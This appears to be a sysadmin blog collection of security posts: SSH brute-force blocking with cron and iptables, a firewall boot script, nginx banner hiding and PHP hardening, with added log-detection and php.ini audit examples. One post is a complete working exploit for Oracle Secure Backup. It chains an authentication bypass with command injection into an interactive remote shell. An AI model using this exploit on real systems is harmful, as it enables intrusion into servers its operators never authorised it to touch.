Oct 24

Add a line to the system crontab (/etc/crontab; the `root` field is the user the job runs as) so the scan runs once a minute. The interval matters: the script only looks at the previous 60 seconds of the log, so running it less often would leave gaps.

* * * * * root /home/cnscn/sh/ssh_scan_crontab.sh >/dev/null 2>&1

ssh_scan_crontab.sh script

    $ cat /home/cnscn/sh/ssh_scan_crontab.sh
    #!/bin/bash
    # Author http://jabin.cublog.cn
    # Modify cnscn http://cnscn2008.cublog.cn
    # Modify xinyv

    # Force the C locale so strftime's %b produces the English month abbreviation
    # that syslog writes. (The original exported LC_ALL=UTC, which is not a valid
    # locale; the timestamps in /var/log/secure are local time, so no TZ change is needed.)
    export LC_ALL=C

    # File that persists the DROP rules so myiptables.sh can replay them at boot.
    # It is executed as root, so keep it owned by root and writable by nobody else.
    BLOCKLIST=/home/cnscn/sh/ssh_scan_iptables.sh
    [ -f "$BLOCKLIST" ] || { echo '#!/bin/bash' > "$BLOCKLIST"; chmod 700 "$BLOCKLIST"; }

    # Gather the last minute's "Failed password ... ssh2" lines from /var/log/secure,
    # count them per source address and emit "count=ip" pairs.
    # $(NF-3) is the address in "... from <ip> port <n> ssh2"; the same field
    # position holds for "Failed password for invalid user <name> from <ip> ..." lines.
    SCANNER=$(awk 'BEGIN{ tm=strftime("%b %e %H:%M",systime()-60);}  $0 ~ tm && /Failed password/ && /ssh2/ {print $(NF-3)}' /var/log/secure |sort|uniq -c |awk '{print $1"="$2;}')

    for i in $SCANNER
    do
           # get failure number
           NUM=`echo $i|awk -F= '{print $1}'`

           # get ip address
           IP=`echo $i|awk -F= '{print $2}'`

           # drop and log: more than 5 failures in the minute and no rule for this
           # address yet (-F takes the address literally so dots are not wildcards,
           # -w stops 10.0.0.1 from matching 10.0.0.12)
           if [ "$NUM" -gt 5 ] && ! /sbin/iptables -vnL INPUT | grep -qFw -- "$IP"
           then
                   /sbin/iptables -I INPUT -s "$IP" -j DROP
                   echo "/sbin/iptables -I INPUT -s $IP -j DROP" >> "$BLOCKLIST"
                   # The original passed "-f /var/log/messages", which tells logger to
                   # read its message from that file; log the address and count instead.
                   logger -i -t "ssh_scan_crontab" "$IP($NUM)..."
           fi
    done
    #End of Script

Two caveats before running this as root from cron. First, `-I INPUT` puts each DROP at the top of the chain, above the "Allow My ip" rule that myiptables.sh inserts, so six wrong passwords from your own address in one minute lock you out; exempt your management address before the iptables call. Second, the threshold only counts failures that fall inside a single calendar minute: an attacker who spreads seven attempts across the minute boundary is never blocked.
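As an added example (not part of the original script), here is the same counting logic in Python over constructed /var/log/secure lines, with the two changes the caveats above call for: a 60-second sliding window instead of one calendar minute, and a whitelist so a management address is never blocked. A second function reproduces the cron script's per-minute bucketing so the difference is visible. The log lines, addresses, year and function names are all assumptions made for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample of /var/log/secure (not taken from a real host).
# 203.0.113.5: six failures inside one minute.
# 198.51.100.7: six failures inside one minute, but it is the admin's own address.
# 192.0.2.9: six failures within 33 seconds that straddle a minute boundary.
SAMPLE_SECURE_LOG = """\
Oct 24 10:15:01 host sshd[2201]: Failed password for root from 203.0.113.5 port 40122 ssh2
Oct 24 10:15:02 host sshd[2203]: Failed password for invalid user admin from 203.0.113.5 port 40123 ssh2
Oct 24 10:15:03 host sshd[2205]: Failed password for root from 203.0.113.5 port 40124 ssh2
Oct 24 10:15:04 host sshd[2207]: Failed password for root from 203.0.113.5 port 40125 ssh2
Oct 24 10:15:05 host sshd[2209]: Failed password for root from 203.0.113.5 port 40126 ssh2
Oct 24 10:15:06 host sshd[2211]: Failed password for root from 203.0.113.5 port 40127 ssh2
Oct 24 10:15:40 host sshd[2213]: Failed password for cnscn from 198.51.100.7 port 51001 ssh2
Oct 24 10:15:41 host sshd[2215]: Failed password for cnscn from 198.51.100.7 port 51002 ssh2
Oct 24 10:15:42 host sshd[2217]: Failed password for cnscn from 198.51.100.7 port 51003 ssh2
Oct 24 10:15:43 host sshd[2219]: Failed password for cnscn from 198.51.100.7 port 51004 ssh2
Oct 24 10:15:44 host sshd[2221]: Failed password for cnscn from 198.51.100.7 port 51005 ssh2
Oct 24 10:15:45 host sshd[2223]: Failed password for cnscn from 198.51.100.7 port 51006 ssh2
Oct 24 10:15:50 host sshd[2225]: Accepted password for cnscn from 198.51.100.7 port 51007 ssh2
Oct 24 10:16:30 host sshd[2227]: Failed password for root from 192.0.2.9 port 33001 ssh2
Oct 24 10:16:31 host sshd[2229]: Failed password for root from 192.0.2.9 port 33002 ssh2
Oct 24 10:16:32 host sshd[2231]: Failed password for root from 192.0.2.9 port 33003 ssh2
Oct 24 10:17:01 host sshd[2233]: Failed password for root from 192.0.2.9 port 33004 ssh2
Oct 24 10:17:02 host sshd[2235]: Failed password for root from 192.0.2.9 port 33005 ssh2
Oct 24 10:17:03 host sshd[2237]: Failed password for root from 192.0.2.9 port 33006 ssh2
"""

# Same fields the awk in the cron script relies on: the address sits in
# "... from <ip> port <n> ssh2", with or without "invalid user".
LOG_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port \d+ ssh2$"
)


def parse_failed_logins(lines, year=2009):
    """Return (timestamp, ip, user) for every 'Failed password' line.

    syslog omits the year, so the caller supplies it (assumed 2009 here)."""
    events = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        events.append((ts, m["ip"], m["user"]))
    return events


def offenders(events, threshold=5, window_seconds=60):
    """Addresses with more than `threshold` failures inside any window_seconds span."""
    by_ip = defaultdict(list)
    for ts, ip, _ in events:
        by_ip[ip].append(ts)
    bad = set()
    for ip, times in by_ip.items():
        times.sort()
        start = 0
        for end, t in enumerate(times):
            # slide the window start forward until it fits within window_seconds of t
            while (t - times[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 > threshold:
                bad.add(ip)
                break
    return bad


def per_minute_offenders(events, threshold=5):
    """What the cron script does: count failures per calendar minute only."""
    counts = defaultdict(int)
    for ts, ip, _ in events:
        counts[(ts.replace(second=0), ip)] += 1
    return {ip for (_, ip), n in counts.items() if n > threshold}


def iptables_rules(ips, whitelist=(), already_blocked=()):
    """Build the DROP commands, skipping whitelisted and already blocked addresses."""
    return [f"/sbin/iptables -I INPUT -s {ip} -j DROP"
            for ip in sorted(ips) if ip not in whitelist and ip not in already_blocked]


def block_plan(log_text, whitelist=("198.51.100.7",), threshold=5, window_seconds=60):
    """End to end: parse, find offenders in a sliding window, emit rules."""
    events = parse_failed_logins(log_text.splitlines())
    return iptables_rules(offenders(events, threshold, window_seconds), whitelist)


if __name__ == "__main__":
    for rule in block_plan(SAMPLE_SECURE_LOG):
        print(rule)
```

With the sample above, the per-minute count misses 192.0.2.9 (three failures in 10:16, three in 10:17) while the sliding window catches it, and the whitelist keeps the admin's 198.51.100.7 out of the rule list even though it tripped the threshold.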
    Start it when the system boots: copy the script to /etc/init.d/myiptables, make it executable and register it with `chkconfig --add myiptables` (the `#chkconfig: 345 85 15` header below means runlevels 3, 4 and 5, start priority 85, stop priority 15).

    $ cat myiptables.sh
    #!/bin/bash
    #chkconfig: 345 85 15
    #description: my iptables rules, which can auto run when system start

    # This is a script
    # Edit by liwei, cnscn
    # establish a static firewall

    #network interface
    interdevice="eth0"

    #port
    #21       ftp
    #15022    sshd
    #25       smtp
    #53       named
    #80       http
    #110      pop3

    #Allow Access port (the list above is only a reference: sshd is opened on 22
    #here, so change this if it really listens on 15022)
    Open_ports="21 20 22 80"

    #unused, kept from the original
    Allow_ports="21 20 80 "

    #clean old rules
    iptables -F
    iptables -X
    iptables -t nat -F
    iptables -t nat -X

    #Always accept loopback and the replies to connections this host opens
    #(DNS answers, outbound HTTP, FTP data). Without these two rules the REJECT
    #rules at the end would cut off the server's own outgoing traffic.
    iptables -A INPUT -i lo -j ACCEPT
    iptables -A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT

    #Add rule for drop bad ip (file written by ssh_scan_crontab.sh; it runs as
    #root, so it must be owned by root and not writable by anyone else)
    BLOCKLIST=/home/cnscn/sh/ssh_scan_iptables.sh
    [ -f "$BLOCKLIST" ] && bash "$BLOCKLIST"

    #Allow My ip (-I puts it in front of the DROP rules just loaded)
    /sbin/iptables -I INPUT -s 111.127.xxx.xxx -j ACCEPT

    for eths in $interdevice ; do

      #
      #iptables -A INPUT -i ! $eths -j ACCEPT

      #Allow all access's port(--dport)
      for Port in $Open_ports ; do
        iptables -A INPUT -i $eths -p tcp --dport $Port -j ACCEPT
        iptables -A INPUT -i $eths -p udp --dport $Port -j ACCEPT
      done

      #Reject everything else arriving on this interface
      iptables -A INPUT -i $eths -p tcp -j REJECT --reject-with tcp-reset
      iptables -A INPUT -i $eths -p udp -j REJECT --reject-with icmp-port-unreachable
    done

    #forbidden ping (1 = ignore echo requests; the original wrote 0, which
    #re-enables ping replies)
    echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

    #End of Script
    Oct 06

    #!/bin/bash

    #Oracle Secure Backup Administration Server authentication bypass, plus command injection vulnerability
    #1-day exploit for CVE-2009-1977 and CVE-2009-1978

    #PoC script successfully tested on:
    #Oracle Secure Backup Server 10.3.0.1.0_win32_release
    #MS Windows Professional XP SP3

    #In August 2009, ZDI discloses a few details regarding a couple of interesting vulnerabilities within Oracle Backup Admin server.
    #Since I was quite interested in such flaws, I did a bit of research. This PoC exploits two separate vulnerabilities: a smart
    #authentication bypass and a trivial command injection, resulting in arbitrary command execution.

    #References:
    #http://www.zerodayinitiative.com/advisories/ZDI-09-058/
    #http://www.zerodayinitiative.com/advisories/ZDI-09-059/

    #Use it for ethical pentesting only! The author accepts no liability for damage caused by this tool.
    #Luca "ikki" Carettoni (blog.nibblesec.org), 10th September 2009

    clear
    echo ":: Oracle Secure Backup Admin Server 10.3 AuthBypass/CodeExec Exploit ::"

    if [[ $# -ne 1 ]]
    then
        echo "usage: ./$(basename $0) <target IP>"
        echo "i.e.: ./$(basename $0) 192.168.0.100"
        exit
    fi

    if ! which curl >/dev/null
    then
        echo "'curl' is required in order to handle HTTPS connections"
        exit
    fi

    TARGET=$1

    #Exploiting CVE-2009-1977 and getting a valid token
    echo "[+] Exploiting CVE-2009-1977 against $TARGET"
    #a uname beginning with "--" (rendered as an en-dash by the blog) is what triggers the bypass
    postdata="button=Login&attempt=1&mode=&tab=&uname=--fakeoption&passwd=fakepwd"
    session=`curl -kis "https://$TARGET/login.php" -d $postdata | grep "PHPSESSID=" | head -n 1 | cut -d= -f 2 | cut -d\; -f 1`

    if [[ -z $session ]]
    then
        echo "[!] Fatal error. No valid token has been retrieved"
        exit
    fi

    echo "[+] I got a valid token: $session"

    #Use a valid session and CVE-2009-1978 in order to inject arbitrary commands
    echo "[+] Exploiting CVE-2009-1978 against $TARGET"
    shell="1%26ver>osb103shelltmp"
    curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
    check=`curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session" | grep -i Microsoft`

    if [[ -z $check ]]
    then
        echo "[!] Fatal error. I cannot execute arbitrary commands"
        exit
    fi

    echo "[+] Enjoy your non-interactive shell! Use EXIT to clean up everything"
    echo
    echo \>$check

    while(true); do
        echo -n \>
        read -r cmd
        if [ "$cmd" == "EXIT" ]
        then
            echo "[+] Removing the temporary file and closing"
            shell="1%26del%20osb103shelltmp"
            curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
            exit
        fi
        #URLencode function: hex-encode every byte as %xx. -v keeps repeated bytes
        #(od otherwise collapses identical lines into '*') and the newline strip
        #joins od's 16-byte output lines, so commands longer than 16 characters survive.
        cmd=`echo -n "$cmd"|od -An -v -t x1|tr -d "\n"|tr " " %`
        shell="1%26$cmd>osb103shelltmp"
        curl -k -s "https://$TARGET/property_box.php?type=CheckProperties&vollist=$shell" -b "PHPSESSID=$session" > /dev/null
        echo "[+] Last successful command execution:"
        curl -ks "https://$TARGET/osb103shelltmp" -b "PHPSESSID=$session"
    done
    #end
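From the defender's side, the two requests the PoC sends after the login are visible in the admin server's web access log: a GET to property_box.php whose vollist value decodes to contain a command separator and an output redirect, and a fetch of the hard-coded temporary file. The login bypass itself travels in a POST body and does not appear in a standard access log. Below is an added detection example written for this page (not part of the exploit or of Oracle's product); the log lines are constructed, and the field layout, tag names and metacharacter set are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed Apache-style access log lines (not a capture from a real host):
# one client runs the PoC above, another uses property_box.php legitimately.
SAMPLE_ACCESS_LOG = """\
203.0.113.5 - - [06/Oct/2009:14:02:11 +0000] "POST /login.php HTTP/1.1" 302 0
203.0.113.5 - - [06/Oct/2009:14:02:12 +0000] "GET /property_box.php?type=CheckProperties&vollist=1%26ver>osb103shelltmp HTTP/1.1" 200 512
203.0.113.5 - - [06/Oct/2009:14:02:13 +0000] "GET /osb103shelltmp HTTP/1.1" 200 60
203.0.113.5 - - [06/Oct/2009:14:03:00 +0000] "GET /property_box.php?type=CheckProperties&vollist=1%26%64%69%72>osb103shelltmp HTTP/1.1" 200 512
198.51.100.7 - - [06/Oct/2009:14:05:00 +0000] "GET /property_box.php?type=CheckProperties&vollist=VOL000001 HTTP/1.1" 200 2048
198.51.100.7 - - [06/Oct/2009:14:06:00 +0000] "GET /index.php HTTP/1.1" 200 1024
"""

ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)
# Characters that, once decoded, let a value spliced into a command line run a
# second command or redirect its output (the PoC uses %26 for '&' and a '>' redirect).
SHELL_META = re.compile(r"[&|;`>]")
POC_TEMPFILE = "osb103shelltmp"  # the file name hard-coded in the PoC


def parse_access_line(line):
    """Split one combined-format line into its fields, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def indicators(entry):
    """Indicator tags for one parsed request; empty when nothing is suspicious."""
    tags = []
    url = urlsplit(entry["target"])
    # parse_qs splits on the literal '&' first and only then decodes %26, so an
    # encoded separator ends up inside the vollist value, exactly as the backend sees it
    params = parse_qs(url.query, keep_blank_values=True)
    if url.path.endswith("/property_box.php"):
        for value in params.get("vollist", []):
            if SHELL_META.search(value):
                tags.append("cmd-injection-in-vollist")
                break
    if POC_TEMPFILE in entry["target"]:
        tags.append("poc-tempfile")
    return tags


def scan_access_log(text):
    """Return (ip, request target, tags) for each flagged line."""
    hits = []
    for line in text.splitlines():
        entry = parse_access_line(line)
        if entry is None:
            continue
        tags = indicators(entry)
        if tags:
            hits.append((entry["ip"], entry["target"], tags))
    return hits


if __name__ == "__main__":
    for ip, target, tags in scan_access_log(SAMPLE_ACCESS_LOG):
        print(ip, ",".join(tags), target)
```

The metacharacter check is the durable signal: a renamed temporary file defeats the `poc-tempfile` tag, but any use of this injection still has to get a separator or redirect through vollist.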

    Jun 13

    To give fingerprinting tools less to work with, turn off the version with the directive "server_tokens off".

    server_tokens
    syntax: server_tokens on|off
    default: server_tokens on
    context: http, server, location
    Whether to send the Nginx version number in error pages and the Server header.

    Note that server_tokens off only drops the version: responses still carry "Server: nginx". If you want to remove the name of the server completely you need to alter the source code prior to compiling.
    Edit /path/to/nginx-0.*/src/http/ngx_http_header_filter_module.c, lines 48 and 49 in the 0.x releases (the position varies by version, so search for ngx_http_server_string):

    static char ngx_http_server_string[] = "Server: nginx" CRLF;
    static char ngx_http_server_full_string[] = "Server: " NGINX_VER CRLF;

    Put in anything you like, keeping the trailing CRLF so the header block stays well formed. Bear in mind that this only defeats banner matching; tools such as httprint (second reference) identify the server from its protocol behaviour, which a changed string does not alter.
    If you want to edit NGINX_VER, it is defined, along with some other relevant constants, in /path/to/nginx-0.*/src/core/nginx.h, lines 11-13.

    Reference: http://wiki.nginx.org/NginxHttpCoreModule#server_tokens
               http://www.net-square.com/httprint/httprint_paper.html

    Jun 09

    PHP is a widely used general-purpose scripting language that is especially suited for web development and can be embedded into HTML. It runs on Linux and Windows servers, and on a shared host it is usually the largest exposure: one careless script can hand an attacker a shell as the web server user. The settings below lock PHP down. All of them live in php.ini, the main configuration file (`php --ini` prints its location), and take effect after the web server is restarted.

    Turn on safe mode:
    safe_mode was PHP's attempt to solve the shared-server problem at the PHP level: a script may only open files owned by the same user as the script itself, and the functions that spawn programs are restricted. Solving the problem at the PHP level is the wrong layer (the isolation belongs in the web server and the OS), but where those layers cannot be trusted many webmasters rely on it, and on a shared host running an old PHP it still raises the bar. Caveat: safe_mode was deprecated in PHP 5.3 and removed in PHP 5.4, so on current versions it does not exist and the isolation has to come from running each site as its own user (see PHPsuexec below) plus open_basedir.

    Example:
    safe_mode = On

    Disable unsafe PHP functions:
    The functions that execute programs are what an attacker needs to turn a code-execution bug in a script into control of the server, and from there into attacks on other servers. Listing them in disable_functions removes them for every script. Caveat: disable_functions only affects internal functions. eval is a language construct, so listing it has no effect, and the list below leaves out exec, proc_open and the backtick operator; extend it to cover whatever your scripts do not need.

    Example:
    disable_functions = phpinfo,eval,system,shell_exec,passthru,popen

    Turn off register_globals:
    With register_globals on, every request parameter (GET, POST, cookie) is injected into the script as a global variable. Because PHP does not require variables to be initialised, any variable a script reads before assigning it (an authorisation flag, an include path) can be supplied by the attacker in the URL, and the script's internal variables silently mix with user-supplied data; most authors never notice where the unexpected value came from. register_globals was removed in PHP 5.4; on older versions turn it off.

    Example:
    register_globals = Off

    Use PHPsuexec:
    The great problem on cPanel servers is that PHP runs as the web server user (nobody) for every site. If one user sets a script to mode 777, that file is writable by nobody, so any other customer on the same box can write a script that searches for 777 files, plant whatever he likes in them and stay anonymous, because the change is attributed to nobody. safe_mode does not help here. PHPsuexec runs each user's scripts as that user, so one customer can no longer read or write another customer's files, and mail sent from a script is attributable to the account that sent it, which is how you trace who is spamming.

    Together these settings protect PHP on a shared server. One more mechanism restricts which files a script can read at all, so another user cannot read or abuse your files: open_basedir.

    Enable open_basedir
    When open_basedir is set, PHP can only open files inside the listed directories (and their subdirectories); a script tricked into including /etc/passwd or another customer's configuration fails. Separate several paths with ':' (';' on Windows). The value is a prefix match, so end an entry with a slash when you mean a directory, otherwise /var/www/html also permits /var/www/html2.

    Example:
    open_basedir = /var/www/html

    Turn off display_errors
    When display_errors is off, PHP errors and warnings are not sent to the browser. Because such warnings often reveal valuable information (file system paths, SQL queries and so on), turn this off on production servers and rely on the log instead.

    Example:
    display_errors = Off

    Turn on the error log
    When log_errors is on, all warnings and errors are written to the file named by error_log. If that file is not set or not writable, they go to the web server's own error log instead (Apache's, typically).

    Example:
    log_errors = On

    Error log filename
    The file used to store warnings and errors. It must be writable by the user or group the web server (Apache) runs as, and it should sit outside the document root, since it contains exactly the paths and queries you just hid with display_errors.

    Example:
    error_log = filename
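To check a server against the settings above without reading php.ini by hand, here is an added audit example written for this page (not from the original article or from PHP). It reads two constructed php.ini fragments, a permissive one and one hardened as recommended here, and reports each deviation; the finding texts, the minimal ini parser and the list of functions it expects in disable_functions are assumptions. safe_mode is left out because it no longer exists on current PHP.

```python
# Constructed php.ini fragments (not from a real server).
WEAK_INI = """\
; permissive fragment: the defaults many shared hosts shipped with
register_globals = On
display_errors = On
log_errors = Off
; open_basedir is unset
disable_functions =
"""

HARDENED_INI = """\
register_globals = Off
display_errors = Off
log_errors = On
error_log = /var/log/php_errors.log
open_basedir = /var/www/html
disable_functions = phpinfo,eval,system,shell_exec,passthru,popen
"""

# Functions the article's example disables (eval is excluded: it is a language
# construct and disable_functions cannot remove it).
REQUIRED_DISABLED = {"phpinfo", "system", "shell_exec", "passthru", "popen"}
TRUE_WORDS = {"1", "on", "true", "yes"}
EVAL_NOTE = "eval is a language construct, not a function: listing it in disable_functions has no effect"


def parse_php_ini(text):
    """Minimal php.ini reader: 'key = value' lines, ';' comments, last value wins.

    Good enough for these directives; it does not handle ';' inside quoted values."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line or "=" not in line:
            continue
        key, value = (part.strip() for part in line.split("=", 1))
        settings[key.lower()] = value.strip('"')
    return settings


def is_on(settings, key):
    """php.ini booleans accept On/1/true/yes; anything else (or absent) is off."""
    return settings.get(key, "").lower() in TRUE_WORDS


def audit_php_ini(text):
    """Return one finding string per deviation from the hardened settings."""
    s = parse_php_ini(text)
    findings = []
    if is_on(s, "register_globals"):
        findings.append("register_globals is On: request parameters become global variables")
    if is_on(s, "display_errors"):
        findings.append("display_errors is On: errors leak paths and queries to the browser")
    if not is_on(s, "log_errors"):
        findings.append("log_errors is Off: errors are recorded nowhere")
    elif not s.get("error_log"):
        findings.append("error_log unset: errors fall back to the web server log")
    if not s.get("open_basedir"):
        findings.append("open_basedir unset: scripts may open any file the web user can read")
    disabled = {f.strip().lower() for f in s.get("disable_functions", "").split(",") if f.strip()}
    missing = sorted(REQUIRED_DISABLED - disabled)
    if missing:
        findings.append("disable_functions missing: " + ", ".join(missing))
    if "eval" in disabled:
        findings.append(EVAL_NOTE)
    return findings


if __name__ == "__main__":
    for label, ini in (("weak", WEAK_INI), ("hardened", HARDENED_INI)):
        print(label)
        for finding in audit_php_ini(ini):
            print("  -", finding)
```

Run it against a real file with `audit_php_ini(open("/etc/php.ini").read())`; the hardened fragment yields only the eval note, which is there to catch the article's own example.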
